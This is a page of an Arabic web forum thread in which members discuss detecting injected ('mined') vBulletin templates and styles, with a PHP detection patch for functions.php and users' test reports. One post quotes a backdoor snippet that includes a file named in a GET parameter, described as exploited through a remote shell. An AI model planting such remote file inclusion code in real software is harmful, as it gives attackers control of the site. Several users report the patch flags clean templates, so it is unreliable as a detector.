صفحة 3 من 6 الأولىالأولى 123456 الأخيرةالأخيرة
النتائج 31 إلى 45 من 90

الموضوع: تلغيم القوالب + تلغيم الإستايلات + ....

  1. #31
    عضو نشيط جدا
    تاريخ التسجيل
    Jun 2004
    المشاركات
    524


    تسلم استاذي العندليب على جهودك في خدمة المنتديات العربية

    قمت بالتجربة على النسخة 3.6.4

    وظهرت صفحة بيضاء بها السطر التالي :

    Warning: Division by zero in /includes/functions.php(5043) : eval()'d code on line 88


    من هذا زيرو :con2: :anger1:






  2. #32


    السلام عليكم ورحمة الله وبركاته

    جزاك الله خيراً أخي العندليب

    لكن هل هذا الموضوع ينطبق أيضاً على نظام قوالب smarty ؟

    تحية لك






  3. #33


    حياكم الله جميعاً وأشكركم على الرد وأتمنى التفاعل أكثر مع الموضوع
    فأرى أن الموضوع ذو أهميه كبرى ويمس شريحه كبيره من البرمجيات المستخدمه في المواقع

    وأشكر كل الأخوان الذين تفضلوا بالرد والشكر وهذا من لطفهم

    الأخ البروفيسور إن شاء الله سأتابع ماذكرت بخصوص مشكلة المشروع الذي تفضلت بذكر إسمه.

    الأخ البـ أحمد ـرنس
    ياليت تعيد صياغة اسئلتك بشكل واضح
    والله مافهمت كل كلامك
    واذا تبي تبحث عن التلغيم في القوالب فقم بعمل الترقيع فاذا ظهرت صفحه بيضاء فهذا يعني أن هناك قالب مصاب ويجب عليك إغلاق منتداك وفحصه.



    الأخ الجنيدي
    حسب علمي أن نظام Smarty يخزن القوالب على ملفات ويتم إستدعاء المتغيرات بداخل القوالب بالأقواس التي أشرنا لها بالطريقه الثانيه للتلغيم فأنا لم أقم بأي تطبيق على هذا النظام وأترك لك التجربه واخبارنا بالنتائج فالبرامج كثيره التي تعمل بنفس الكيفيه لذلك ذكرت البرمجيات التي تعمل عليها أساليب التلغيم.



    بالتوفيق





    __________________
    al3ndaleeb[@]uk2.net

  4. #34
    عضو نشيط
    تاريخ التسجيل
    Oct 2003
    المشاركات
    64


    بارك الله فيك اخوي العندليب وجزاك الله خير

    اخوي جربته في الاباتشي واطلعت الصفحه بيضاء

    للعلم النسخه منزوعة كود التبليغ

    وياليت لو تذكر ماهو القالب اللي يتم التلغيم فيه

    مع العلم ان اغلب المخترقين يلغمون FORUMHOME

    ودمت بخير






  5. #35
    عضو نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    54


    اشكرك اخي العندليب على هذا لموضوع المفيد

    وبصراحة قمت بالترقيع للملف functions.php بالكود الموجود للاستبدال

    وما اشتغل المنتدى واعطاني هذه العبارة

    Warning: Division by zero in /includes/functions.php(4382) : eval()'d code on line 10

    ترى ماهي المشكلة علما اصدار المنتدى Powered by vBulletin Version 3.5.4

    اتمنى منك المساعدة في الحل ولك تحياتي






  6. #36


    السلام عليكم ورحمة الله وبركاته

    يا أخواني الترقيع الذي أدرجته للـ vbulletin ذكرت بأنه ليس ترقيعاً كاملاً وهو مجرد مساعد .
    والغرض منه معرفة ما إذا كان المنتدى مصاب بأحد الطريقتين في التلغيم أو لا
    وبمجرد ظهور صفحه بيضاء فهذا يدل على أن احد قوالب المنتدى تم تلغيمه

    والأخوان الذين ذكروا بأنهم شاهدوا رسالة الخطأ بعد التركيب فهذا يدل على أن هناك قالب ملغم

    الترقيع يحتاج لتطوير ومناقشه ولم أجد أحداً يناقشني فيه من الأخوان هنا!

    تطوير للترقيع بدلاً من الترقيع الأول:
    1- إفتح ملف functions.php وابحث عن السطر التالي:
    كود PHP:
    return $template
    2- قم بإستبدال السطر بما يلي:
    كود PHP:
    $temp preg_replace('#[\r|\n|\s|\t|\0]#i'''$template); 
    if(
    preg_match('#["\.|\{\$|\}\}]#i'$temp)){ 
        
    $template "<b>$templatename</b>  injected.<br><br>you must repair this template.".'{${exit()}}'

    return 
    $template
    3- قم بحفظ الملف ورفعه.



    يساعد هذا التطوير للترقيع بعرض إسم القالب المصاب قبل تنفيذه والتوقف .

    قمت بتجربته على النسخ الجديده 3.5 و 3.6 والنسخ القديمه 3.0 أيضاً.

    موفقين وبانتظار مداخلاتكم





    __________________
    al3ndaleeb[@]uk2.net



  7. جزاك الله كل خير اخي العندليب
    معلومات مفيدة جدا والف شكراً على كل ماتقدمه لنا من جديد ونصائح مفيدة

    جربت الترقيع أو الأكواد المساعدة التى ذكرتها على السيرفر الشخصي وأيضا على الموقع مباشرة
    وبصراحة جعلتنى اشك في كل الإستايلات لدي ( حتى التى صممتها بنفسي من الصفر على الستايل الإفتراضي )!

    ظهرت الصفحة البيضاء التى تقول عنها مع جميع الإستايلات ـ وجربتها ايضا ولم يكن متواجد على المنتدى غير الستايل الإفتراضي فقط بدون اى تعديل وظهرت ايضا فكيف يحدث ذلك ؟؟

    النسخه المستخدمة كانت 364 "منزوعه الكود" ..

    أنا جديد على php ومعلوماتي محدودة فيها ، ولكن ربما هذا الكود المساعد فيه خطأ وليس هو الحل للكشف على قوالب المنتدى والا اصبحت كل الإستايلات مــلغــومــة!
    ومنتظرين أحد من خبراء php لمناقشتك ولتطوير الكود كما قلت لنصل لحل سليم - ان وجد - لفحص الإستايل ..





    __________________
    كتوم في المصنع {...}

  8. #38
    عضو نشيط جدا
    تاريخ التسجيل
    Sep 2003
    المشاركات
    538


    ألف رحمة على والديك حليت مشكلتي الله يجزيك خير






  9. #39


    السلام عليكم ورحمة الله وبركاته

    وحياكم الله وبارك الله فيكم ووفقكم الله لكل مايحب ويرضى

    الأخ ca2om شكرا لمداخلتك

    النسخه المستخدمة كانت 364 "منزوعه الكود" ..
    هذا في نظري أحد الأسباب الأخرى التي لم نذكرها
    فهل القوالب الملغومه تنتشر فقط من الإستايلات ؟
    بالعكس لا طبعاً
    فالنسخ المنزوعه نسخ غير مضمونه من وجهة نظري والله العالم بما فيها ومن هو القائم على نزع أكوادها ومن أين مصدرها فأغلب هذه النسخ متداوله بين الكل ومنتشره على أكثر من موقع لذلك فأنا أفضل الحصول على نسخه أصليه عند بدء أي منتدى وبعد ذلك أقوم بنزع أكواد التبليغ بنفسي وأتابع كل الأمور الأمنيه المتعلقه بالمنتدى.

    أنا جديد على php ومعلوماتي محدودة فيها ، ولكن ربما هذا الكود المساعد فيه خطأ وليس هو الحل للكشف على قوالب المنتدى والا اصبحت كل الإستايلات مــلغــومــة!
    ومنتظرين أحد من خبراء php لمناقشتك ولتطوير الكود كما قلت لنصل لحل سليم - ان وجد - لفحص الإستايل ..
    طيب ياليت تجرب الترقيع الأخير بعد التطوير وتخبرنا عن نتيجتك وماهي القوالب التي كانت مصابه وماهو محتواها ونناقش معاً أين مكمن الخلل.

    موفقين جميعاً





    __________________
    al3ndaleeb[@]uk2.net

  10. #40
    عضو فعال جدا
    تاريخ التسجيل
    Jan 2005
    المشاركات
    3,948


    الله يعطيك العافية عندل

    والحمدلله كل ستايلاتي من تصميمي ومعدل على ستايل الشركة الاصلي

    مااخوفي الا من الهاكات

    بس اللــــه يخارجنا





    __________________
    سبحان الله ... اللهم اني استغفرك و اتوب الليك
    Twitter
    سيرفرات موقعي على ليكود ويب



  11. اقتباس المشاركة الأصلية كتبت بواسطة العندليب
    طيب ياليت تجرب الترقيع الأخير بعد التطوير وتخبرنا عن نتيجتك وماهي القوالب التي كانت مصابه وماهو محتواها ونناقش معاً أين مكمن الخلل.

    موفقين جميعاً
    أشكرك مرة أخري وهذا ماحدث بالفعل أخي العندليب ـ وتمت التجربه على التطوير الأخير للكود ونفس الأمر ظهور الصفحة البيضاء فقط بدون اى توضيح عن القالب المصاب او الخلل أين ..





    __________________
    كتوم في المصنع {...}

  12. #42


    اقتباس المشاركة الأصلية كتبت بواسطة ca2oom
    أشكرك مرة أخري وهذا ماحدث بالفعل أخي العندليب ـ وتمت التجربه على التطوير الأخير للكود ونفس الأمر ظهور الصفحة البيضاء فقط بدون اى توضيح عن القالب المصاب او الخلل أين ..
    صدقت
    الكوود الذي أدرجته به خطأ طفيف فعذراً على ذلك وجل من لا يسهو

    هذا هو الكوود الصحيح بعد التطوير

    كود PHP:
         $temp preg_replace('#[\r|\n|\s|\t|\0]#i'''$template);  
        if(
    preg_match('#["\.|\{\$|\}\}]#i'$temp)){
            
    error_reporting(0);  
            
    $template "<b>$templatename</b>  injected.<br><br>you must fix this template.";
            
    $template ' {${print(\''.$template.'\')}}{${exit()}}';  
        }  
        return 
    $template
    ومنتظر التجربه.

    موفق





    __________________
    al3ndaleeb[@]uk2.net

  13. #43
    عضو نشيط جدا
    تاريخ التسجيل
    Jul 2003
    المشاركات
    334


    يعطيك العافيه اخوي العندليب انا جربت طريقتك وطلع لي اسم التمبلت : lastthreadshower

    شنو الحل بالتمبلت هذا وشلون اعرف وين التلغيم؟؟






  14. #44
    ينتظر رسالة التوكيد
    تاريخ التسجيل
    May 2006
    المشاركات
    130


    هلا اخى الكريم العندليب

    لى اضافة وهى

    كود PHP:
    if($_GET[yee7]) { 
     include(
    $yee7); 
     exit; 

    وجدتها فى بعض مواقع هاكر اجنبية مع شرح طريقة استغلال الامر

    طبعا الاستغلال عبر شل من خارج الموقع






  15. #45
    عضو نشيط
    تاريخ التسجيل
    Mar 2003
    المشاركات
    129


    هلا العندليب

    انا جربته وطلعت لى صفحه بيضاء مكتبوب فيها

    option injected.

    you must fix this template.

    ايش الحل





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض